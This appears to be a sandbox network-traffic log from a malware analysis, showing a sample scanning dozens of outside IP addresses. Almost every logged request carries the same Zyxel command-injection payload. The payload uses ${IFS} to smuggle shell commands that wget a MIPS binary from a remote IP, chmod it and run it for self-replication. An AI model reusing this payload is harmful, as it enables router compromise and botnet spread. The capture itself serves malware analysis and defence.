                                            Feb 2, 2024 06:20:58.362339973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            790192.168.2.154410675.177.233.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362360954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            791192.168.2.1549786220.36.131.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362406015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            792192.168.2.1542524208.185.95.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362436056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            793192.168.2.154547466.200.5.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362483978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            794192.168.2.1554624149.222.72.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362519979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            795192.168.2.154010238.54.124.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362550974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            796192.168.2.154272644.29.189.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362597942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            797192.168.2.154872095.28.31.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362642050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            798192.168.2.1559148205.85.165.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362689972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            799192.168.2.1534078107.95.137.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362720013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            800192.168.2.1543894108.40.12.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362760067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            801192.168.2.1556194222.124.157.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362787008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            802192.168.2.1557178178.53.233.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362818956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            803192.168.2.153651240.213.36.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362850904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            804192.168.2.1557338141.129.61.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362881899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            805192.168.2.155907246.113.191.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362917900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            806192.168.2.153819235.29.34.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.362953901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            807192.168.2.1552806138.210.131.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363001108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            808192.168.2.153333846.57.188.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363029003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            809192.168.2.1557828120.241.225.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363086939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            810192.168.2.1549306124.23.21.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363128901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            811192.168.2.154784053.234.245.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363159895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            812192.168.2.1533120131.185.65.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363193035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            813192.168.2.1533154123.11.73.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363234043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            814192.168.2.153491868.238.63.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363274097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            815192.168.2.155519444.126.83.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363326073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            816192.168.2.1559808223.108.225.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363357067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            817192.168.2.155525874.149.133.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363392115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            818192.168.2.154800295.145.134.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363441944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            819192.168.2.1548396165.114.62.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363476992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            820192.168.2.1545580174.156.41.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363523960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            821192.168.2.1546488114.21.180.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363565922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            822192.168.2.154183240.183.18.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363585949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            823192.168.2.153389627.177.227.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363620996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            824192.168.2.154787864.14.97.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363658905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            825192.168.2.1542484200.35.234.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363689899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            826192.168.2.1541864151.158.177.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363730907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            827192.168.2.155894654.163.231.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363785982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            828192.168.2.1555146147.191.33.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363806963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            829192.168.2.1558128211.162.187.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363836050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            830192.168.2.155434643.219.242.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363888979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            831192.168.2.1552432199.245.183.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363908052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            832192.168.2.1536086156.103.97.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363935947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            833192.168.2.155594617.243.179.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.363970995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            834192.168.2.1534248124.242.188.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.364005089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            835192.168.2.15465049.135.170.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.364025116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            836192.168.2.1539470204.47.173.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.364047050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            837192.168.2.1551240118.63.44.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.364089012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            838192.168.2.154189491.12.100.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.364135027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            839192.168.2.1536172133.0.85.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.364166021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            840192.168.2.1547384133.220.134.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.364216089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            841192.168.2.154639670.165.11.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.384470940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            842192.168.2.1537350196.14.142.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.384511948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            843192.168.2.154410899.181.107.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.384542942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            844192.168.2.156094831.81.206.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.384607077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            845192.168.2.1560718138.153.132.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.384640932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            846192.168.2.154496281.33.89.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.384684086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            847192.168.2.1547088173.4.82.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.384725094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            848192.168.2.155075868.206.206.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.384788036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            849192.168.2.155125839.240.126.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.384823084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            850192.168.2.1556800217.181.7.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.384850979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            851192.168.2.1534100191.208.218.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.384897947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            852192.168.2.1549230101.9.30.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.384923935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            853192.168.2.1543610146.213.239.7443
                                            TimestampBytes transferredDirectionData
